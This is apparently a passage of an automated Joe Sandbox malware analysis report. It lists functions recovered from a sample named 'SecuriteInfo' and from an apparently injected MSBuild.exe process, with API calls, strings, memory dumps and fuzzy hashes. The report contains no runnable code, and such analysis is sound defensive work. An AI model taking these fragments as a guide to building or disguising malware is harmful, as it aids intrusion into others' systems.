Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Strings

OutputStringPointer, xrefs: 6CEA018C
StringSink: OutputStringPointer not specified, xrefs: 6CEA019B

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
API String ID: 3718517217-1331214609
Opcode ID: 73b70d3facb836e27c4474b551cf65e5d0674d9b1552e1621f083701cb9f4a21
Instruction ID: c28aaa1e9a06f7556f5c76a6ed98a4a359439ec3de18b736c46559c3cda13132
Opcode Fuzzy Hash: 73b70d3facb836e27c4474b551cf65e5d0674d9b1552e1621f083701cb9f4a21
Instruction Fuzzy Hash: 5A216FB1D04288AFCB14CFD9D890BEDFBB4EB59314F10865EE825A7B91DB355A08CB50

Function 6CE94620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE94636

Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF913A
Part of subcall function 6CEF9125: __CxxThrowException@8.LIBCMT ref: 6CEF914F
Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF9160

_memmove.LIBCMT ref: 6CE9466F

Strings

invalid string position, xrefs: 6CE94631

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: eec2422a44dbd6f9e9d6e241fbfe454956b22ca184b2733059a2f363df551a69
Instruction ID: b0ce112be3df998f0fe2a8b6ae95a94c756faa7c8813ebc4f3434be3e1f2c0c1
Opcode Fuzzy Hash: eec2422a44dbd6f9e9d6e241fbfe454956b22ca184b2733059a2f363df551a69
Instruction Fuzzy Hash: 3901DBB23042404BD320CD5CDC8095AB7B6DBD1754B344A2ED1A5CBF02D6B1DC42C7A2

Function 6CECACA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CECACF8

Strings

PublicExponent, xrefs: 6CECAD1F
Modulus, xrefs: 6CECAD30

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: 10a6ca7c4e425ca63d29face544459ccbcc4f8a5407037fc014035598dd2cb82
Instruction ID: 457e6dda8b90b63f8753517860524ababfe729a7d2f089314db18bab93fdec77
Opcode Fuzzy Hash: 10a6ca7c4e425ca63d29face544459ccbcc4f8a5407037fc014035598dd2cb82
Instruction Fuzzy Hash: 5611BF71A083049EC300DF68CA4158BBBF4EFD6648F20465EF4A15BB60DB31994CCB93

Function 6CEEB7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CEEB848

Strings

PublicExponent, xrefs: 6CEEB86F
Modulus, xrefs: 6CEEB880

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: a55399f1562ec896407bbb1296e1840bbca5b37e5c03f273101f063b54ba9da7
Instruction ID: 70c02062a0893b2d475757a0af802cacd154af7d947b33c1083f5b7b7ca3e863
Opcode Fuzzy Hash: a55399f1562ec896407bbb1296e1840bbca5b37e5c03f273101f063b54ba9da7
Instruction Fuzzy Hash: 401101719093449EC300DF6C894148BBBF0AFDA288F20062EF8805BB50DB359948CB9A

Function 6CECB5F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CECB605

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

_memmove.LIBCMT ref: 6CECB634

Strings

vector<T> too long, xrefs: 6CECB600

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 7dc1c7084b2d76bf12fc6f790504721763b4e1291458ec1e07573007f7de1f47
Instruction ID: 5ecc0365a315759663591d10ce139ab06db4c7e3bc6676b32a1c7345d546f4ae
Opcode Fuzzy Hash: 7dc1c7084b2d76bf12fc6f790504721763b4e1291458ec1e07573007f7de1f47
Instruction Fuzzy Hash: C20188B2A002059FD724DEA9DD91C5BB3E8EB54314724492DD5ABC3B50E671F8048B61

Function 6CEF4230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEF4241

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

_memmove.LIBCMT ref: 6CEF4277

Strings

vector<bool> too long, xrefs: 6CEF423C

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<bool> too long
API String ID: 1785806476-842332957
Opcode ID: e4894605ba059b66dcffd6e9f15998c490c28d754e24cf994f645a915a627a69
Instruction ID: b8f336871c55b08b4745b49c6867395a72e2f3bee385c25db4500a25bcfb1e9a
Opcode Fuzzy Hash: e4894605ba059b66dcffd6e9f15998c490c28d754e24cf994f645a915a627a69
Instruction Fuzzy Hash: 5C01D472A001055BD704CFA9DDD08AEB3B9FB84358F61423FE52687B40E731E90ACA90

Function 6CEF3840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEF3855

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

_memmove.LIBCMT ref: 6CEF3880

Strings

vector<T> too long, xrefs: 6CEF3850

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 0655b353c0a2557226d209e7502899e096ea0576591b121e1508ec6289c3bf50
Instruction ID: e752f624f040f246435029bc29c8fb275b6cc2d149f1e0264b1484fd8f65d31b
Opcode Fuzzy Hash: 0655b353c0a2557226d209e7502899e096ea0576591b121e1508ec6289c3bf50
Instruction Fuzzy Hash: 5C0171725006099FD314DEA9D884C9AB3E8EF442147614A3DE5AAD3B90EA75F8058B61

Function 6CEFBFB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CEFABC3: __getptd.LIBCMT ref: 6CEFABC9
Part of subcall function 6CEFABC3: __getptd.LIBCMT ref: 6CEFABD9

__getptd.LIBCMT ref: 6CEFBFC3

Part of subcall function 6CEFEAE6: __getptd_noexit.LIBCMT ref: 6CEFEAE9
Part of subcall function 6CEFEAE6: __amsg_exit.LIBCMT ref: 6CEFEAF6

__getptd.LIBCMT ref: 6CEFBFD1

Strings

csm, xrefs: 6CEFBFDF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction ID: c8acfa6e59bf539a1908ae4ca9f92972bc1814ee596c28dd66a1b94163636afc
Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction Fuzzy Hash: 9E014634A017048EDB34AF62D440AEDB3B6AF0821DF74596ED0719AB90DB319987CB91

Function 6CF03EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6CF03ED9
DName::DName.LIBCMT ref: 6CF03EE5

Strings

{flat}, xrefs: 6CF03ED4

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: cb12f6a0224499b1835008643da5ce9f6f10ab947419ee5e42cad1d8504c6c40
Instruction ID: c9dbc86b8f3e2c6007039e79dcb3e6ea3d02e32a573501895e29aca45ea13f69
Opcode Fuzzy Hash: cb12f6a0224499b1835008643da5ce9f6f10ab947419ee5e42cad1d8504c6c40
Instruction Fuzzy Hash: 2EF0E571354244AFCB10CF58C061FE83BB29B82B5AF04C181E90C0FB42C772D84AD790

Function 6CEAC4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 6CEAC4A4
VariantCopy.OLEAUT32(00000000,/5l), ref: 6CEAC4AF

Strings

/5l, xrefs: 6CEAC4AA, 6CEAC4AD

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$CopyInit
String ID: /5l
API String ID: 4248132287-2072523891
Opcode ID: 1101d968c17725a815216d40140cec52f31aafc9fe8952c4145de051b6b6b086
Instruction ID: a9f707d307c9b84596922caa077d2f6bdedba1c4dc33cc7f6c4b99fed7426e5e
Opcode Fuzzy Hash: 1101d968c17725a815216d40140cec52f31aafc9fe8952c4145de051b6b6b086
Instruction Fuzzy Hash: 89D022303001042B46022AA0CC0CEDB3B7C8F136943020020FE10CAB00D738C500ABF9

Function 6CEA7680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,67D4BDE6), ref: 6CEA76AD
LeaveCriticalSection.KERNEL32(?,?,?,67D4BDE6), ref: 6CEA76FF
EnterCriticalSection.KERNEL32(67D4BDE6,?,?,?,67D4BDE6), ref: 6CEA770D
LeaveCriticalSection.KERNEL32(67D4BDE6,?,00000000,?,?,?,?,67D4BDE6), ref: 6CEA772A

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

Part of subcall function 6CEA6D40: _rand.LIBCMT ref: 6CEA6DEA

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave$_malloc_rand
String ID:
API String ID: 119520971-0
Opcode ID: a49708ff45816b04b8d1a5bb09b5996830ad6c2a41aee546dcd0f160bf9c657a
Instruction ID: 1c72a24c9e2c12826c03724b4a5fc796c2965f992c0f090f20e9ed29f82dc444
Opcode Fuzzy Hash: a49708ff45816b04b8d1a5bb09b5996830ad6c2a41aee546dcd0f160bf9c657a
Instruction Fuzzy Hash: 31216871904649AFC710DF95CC45BDBB7BCFF81258F214619E8169BA40EB71A905CBA0

Function 6CEA9580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?), ref: 6CEA95A9
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6CEA95CA
EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CEA95DA
LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6CEA95FB

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 599acb5facb28d69d50c7b91a69a87ce88f17a5f840d7b2cb6cf22a1e7347f89
Instruction ID: 21424045a30929639f848e4e5867fd61d67ac6e60d84e2cf34baa44bcaf80a3e
Opcode Fuzzy Hash: 599acb5facb28d69d50c7b91a69a87ce88f17a5f840d7b2cb6cf22a1e7347f89
Instruction Fuzzy Hash: CD117272A05108EFC700CFD9E481DDEFBB8FF91218B21419AE5159BA10D731EA56CBA0

Analysis Process: MSBuild.exePID: 5316, Parent PID: 1048COMMON

Execution Graph

Execution Coverage:	16.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.3%
Total number of Nodes:	310
Total number of Limit Nodes:	17

Executed Functions

Function 00430616 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 004306C4
GetSystemMetrics.USER32 ref: 004306D8
DeleteObject.GDI32 ref: 00430740
SelectObject.GDI32 ref: 0043079A
SelectObject.GDI32 ref: 0043082E
DeleteObject.GDI32 ref: 0043086B

Strings

, xrefs: 004307FB

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 1449868515-3916222277
Opcode ID: cd70b824810e98a6a0dd74e089ae4939813379ae9d6a4f6dd54e232c3b301a6b
Instruction ID: b70df4d09fca917dfa98c56f67c2eeb7f50677711d94b9cc0bf9bfd4c27e7214
Opcode Fuzzy Hash: cd70b824810e98a6a0dd74e089ae4939813379ae9d6a4f6dd54e232c3b301a6b
Instruction Fuzzy Hash: 9FA15DB4614B009FC364DF29D991A16BBF0FB49700F10896DE99AC7760D731B849CB56

Function 004263C6 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 816
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 004267B9
GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 004268A4

Strings

SVZQ, xrefs: 004268AF

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: ComputerName
String ID: SVZQ
API String ID: 3545744682-3438672366
Opcode ID: 6974411d3339ef7d4537fa75bf7ce38507dac59cd7e635de215504003c166d59
Instruction ID: d1b9ca03675c0ca073aa24b9971f355526ae4c6f74f3a69f0a3b2fe6d3a1ff85
Opcode Fuzzy Hash: 6974411d3339ef7d4537fa75bf7ce38507dac59cd7e635de215504003c166d59
Instruction Fuzzy Hash: 9F52B0742046918FE325CF29D4A0B22FBF1EF57304F69859DD0C68B392D739A846CBA5

Function 004263D4 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 686
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

SVZQ, xrefs: 004268AF

Memory Dump Source

Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID: SVZQ
API String ID: 0-3438672366
Opcode ID: c7096b3c1dcda8451c8a58179f0c509e164c73ce21d76a298f677621a80a0ed4
Instruction ID: 86c0e0361f7d1bc27318b62b175c37bc8ba2617b118bb2386df6aa83aaa4c60b
Opcode Fuzzy Hash: c7096b3c1dcda8451c8a58179f0c509e164c73ce21d76a298f677621a80a0ed4
Instruction Fuzzy Hash: A632A0B06046918FE325CF29D4A0722BBF1FF57304F69859DD4C68B392D339A845CBA5

Function 0041C670 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041C770
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041C79B

Strings

BE, xrefs: 0041C6BB

Memory Dump Source

